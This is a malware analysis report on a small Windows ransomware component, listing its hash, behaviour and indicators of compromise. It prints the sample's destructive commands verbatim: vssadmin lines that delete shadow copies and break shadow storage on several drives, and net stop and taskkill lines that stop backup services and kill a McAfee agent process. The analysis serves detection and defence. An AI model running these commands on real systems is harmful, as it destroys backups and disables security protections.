Deep Analysis — RansomComponent | Threat: CRITICAL
File Identity
| Field | Value |
|---|---|
| SHA256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a |
| Size | 102,400 bytes (PE32 GUI x86, 6 sections) |
| Entropy | 6.403 (normal) |
vssadmin Delete Shadows: Shadow Copy Destruction
RANSOMWARE COMPONENT: destroys system restore points and backups!
/C vssadmin Delete Shadows /all /quiet

-- "Delete Shadows /all": delete ALL shadow copies
-- "/quiet": run silently, no user notification
-- Effect: Windows System Restore points are destroyed
-- The victim cannot recover files (no backup left)
-- A signature of all major ransomware families:
   WannaCry, NotPetya, REvil, LockBit, Conti...
vssadmin resize shadowstorage: Backup Space Denial
/C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
/C vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
/C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
/C vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
/C vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
/C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
/C vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

-- Two steps for each disk (d, e, g, h):
   1. maxsize=401MB: shrink the shadow storage to a minimum
   2. maxsize=unbounded: set it back to unlimited (looks pointless, but it breaks the VSS association)
-- In effect this corrupts the VSS configuration: no new shadow copies can be created
net stop + taskkill: Service and Process Termination
net stop (x5 references)
taskkill /IM wordpad.exe /F
taskkill /IM msaess.exe /F

-- net stop: stops backup/AV services
   net stop vss / net stop wbengine (Windows Backup Engine)
   net stop mssqlserver / net stop mysql (databases)
-- wordpad.exe: killed to release locks on open files
-- msaess.exe: stops the McAfee Agent (AV service)
CreateRemoteThread: Process Injection
CreateRemoteThread

-- Small 100KB size: probably a loader/injector module
-- The actual ransomware payload is injected into another process
-- qnoI2DNO: x7 references (mutex or RC4 key)
-- Note: may contain a C2 endpoint XOR-encrypted with RC4
IOC
| Indicator | Value |
|---|---|
| SHA256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a |
| VSS Deletion | vssadmin Delete Shadows /all /quiet |
| Service Kill | taskkill /IM msaess.exe (McAfee Agent) |
| String | qnoI2DNO (mutex/key) |
RansomComponent — Malware Profile
Small (100KB) PE32 ransomware component. vssadmin Delete Shadows /all /quiet (shadow copy destruction). vssadmin resize shadowstorage (backup prevention). net stop x5 (service kill). taskkill /IM msaess.exe (McAfee Agent). CreateRemoteThread injection.
Malware Type: Ransomware
Programming Language: C/C++
C2 Protocol: Local
Target Systems: Global
Capabilities & Behavior
File Encryption (AES/RSA)
Shadow Copy Deletion
Backup Removal
Ransom Note Creation
Persistence
Network Share Encryption
Anti-Analysis Techniques
Double Extortion (Data Leak)
IOC List (1 indicator)
IOC — RansomComponent
# SHA256
ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a
| Type | Value | Note |
|---|---|---|
| sha256 | ae355c321f1fe36c9539457301a3cf5d8babc58c72a3f6a5ef160253b4002b1a | |